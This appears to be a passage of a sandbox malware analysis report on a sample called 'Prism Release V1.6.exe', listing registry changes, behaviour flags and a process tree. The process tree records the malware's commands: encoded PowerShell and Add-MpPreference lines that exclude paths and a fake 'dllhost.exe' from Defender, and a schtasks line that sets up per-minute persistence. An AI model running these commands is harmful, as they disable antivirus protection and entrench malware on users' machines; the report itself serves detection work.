| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcwBhACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AeQBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIABSAFUATgAgAEEAUwAgAEEARABNAEkATgAgAEkARgAgAEkATgBKAEUAQwBUAEkATwBOACAARgBBAEkATABTACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBoAHAAeQAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAZABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdgBrACMAPgA="
C:\Users\Admin\AppData\Roaming\Prism.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
